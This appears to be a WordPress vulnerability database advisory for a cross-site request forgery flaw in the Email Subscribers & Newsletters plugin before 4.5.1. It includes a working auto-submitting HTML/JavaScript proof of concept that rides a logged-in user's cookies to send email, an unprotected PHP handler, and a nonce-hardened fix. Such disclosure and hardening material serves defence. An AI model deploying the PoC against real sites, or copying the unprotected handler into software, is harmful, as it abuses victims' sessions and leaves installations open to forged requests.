wpexploit / wpvulndb WPEX-ID: E6F3170B-9589-4405-AFCF-F2756B1F496F
History: Jul 18, 2020 - 12:00 a.m.

Email Subscribers & Newsletters < 4.5.1 - Cross-site Request Forgery in send_test_email()

2020-07-18 00:00:00
wpvulndb
7

EPSS: 0.001 (Low), Percentile: 42.1%

An attacker could exploit this issue by convincing a user who is logged in to WordPress to open a specially crafted page or URL; the page then issues a forged request to the plugin's send_test_email AJAX handler, which sends email from the affected user's WordPress installation without any nonce or referer check stopping it.

<!DOCTYPE html>
<html>
<body onload=run()>
<script>
// PoC: the page fires a cross-origin POST to admin-ajax.php as soon as it
// loads; withCredentials = true makes the browser attach the victim's
// WordPress session cookies, so the request is handled as that user.
function run() {
  var targetUrl = "http://example.com/webpage";
  var email = "[email protected]";
  var subject = "PoC";
  var content = "add content here";

  var xhttp = new XMLHttpRequest();
  // Form fields are URL-encoded so spaces and special characters survive
  // the application/x-www-form-urlencoded body.
  var data = "es_test_email=" + encodeURIComponent(email) +
             "&subject=" + encodeURIComponent(subject) +
             "&content=" + encodeURIComponent(content) +
             "&action=es_send_test_email";
  var url = targetUrl + "/wp-admin/admin-ajax.php";
  var method = "POST";

  xhttp.open(method, url);
  xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  xhttp.withCredentials = true;
  xhttp.send(data);
}
</script>
</body>
</html>
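The defensive counterpart, as an added example that is not the plugin's own code: a hypothetical WordPress admin-ajax handler for the es_send_test_email action, first in the unprotected shape that the PoC above relies on, then hardened with the standard WordPress CSRF controls (a capability check plus a nonce verified by check_ajax_referer()). The function names, the capability and the nonce action name are assumptions for illustration.

```php
<?php
// Added example (not the plugin's code). Handler names, the capability and
// the nonce action are assumptions chosen for illustration.

// Unprotected shape: any page that can make the logged-in user's browser
// POST to admin-ajax.php can trigger a mail send, because nothing ties the
// request to a page the user actually visited.
function es_send_test_email_unprotected() {
    $to      = sanitize_email( $_POST['es_test_email'] ?? '' );
    $subject = sanitize_text_field( $_POST['subject'] ?? '' );
    $content = wp_kses_post( $_POST['content'] ?? '' );
    wp_mail( $to, $subject, $content );
    wp_send_json_success();
}

// Hardened shape: require a capability AND a valid nonce. check_ajax_referer()
// terminates the request with HTTP 403 when the nonce is missing or invalid.
// The nonce is only emitted on the plugin's own admin page, which a
// cross-origin page cannot read, so a forged request cannot supply it.
function es_send_test_email_hardened() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }
    check_ajax_referer( 'es_send_test_email_nonce', 'security' );

    $to      = sanitize_email( $_POST['es_test_email'] ?? '' );
    $subject = sanitize_text_field( $_POST['subject'] ?? '' );
    $content = wp_kses_post( $_POST['content'] ?? '' );
    if ( ! is_email( $to ) ) {
        wp_send_json_error( 'invalid recipient', 400 );
    }
    wp_mail( $to, $subject, $content );
    wp_send_json_success();
}

// WordPress maps action=es_send_test_email to this hook for logged-in users.
add_action( 'wp_ajax_es_send_test_email', 'es_send_test_email_hardened' );

// The plugin's admin page must hand the nonce to its legitimate JavaScript,
// which then posts it as the "security" field alongside the other fields:
// wp_localize_script( 'es-admin', 'esAjax', array(
//     'security' => wp_create_nonce( 'es_send_test_email_nonce' ),
// ) );
```

Beyond the nonce, restricting the handler to a capability such as manage_options also keeps low-privilege accounts from sending mail even when the CSRF path is closed.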
